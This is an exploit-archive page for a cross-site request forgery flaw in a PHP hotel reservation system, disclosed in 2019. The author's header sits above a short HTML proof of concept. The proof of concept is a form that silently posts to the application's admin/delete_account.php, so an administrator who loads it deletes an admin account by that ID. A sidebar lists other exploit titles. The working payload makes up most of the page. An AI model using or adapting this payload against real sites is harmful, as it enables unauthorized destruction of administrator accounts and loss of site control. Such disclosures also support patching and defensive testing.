Simple online hotel reservation system crosssite request forgery (delete admin) Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2019-02-28 | Type : webapps | Platform : php
This exploit / vulnerability Simple online hotel reservation system crosssite request forgery (delete admin) is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Exploit Title: Simple Online Hotel Reservation System - Cross-Site Request Forgery (Delete Admin)
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan[@]gmail[.]com
# Discovery Date: February 25, 2019
# Vendor Homepage: https://code-projects.org/
# Software Link : https://code-projects.org/simple-online-hotel-reservation-system-in-php-with-source-code/
# Tested on: Kali linux, Windows 8.1

# PoC:

<html>
<head>
<title>Delete Admin</title>
</head>
<body>
<form method = "POST" action="http://localhost/[PATH]/admin/delete_account.php?admin_id=1">
<!-- You can change admin_id -->
<button>Delete</button>
</form>
</body>
</html>

Simple online hotel reservation system crosssite request forgery (delete admin)


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php
▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple
▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
Simple online hotel reservation system crosssite request forgery (delete admin) Vulnerability / Exploit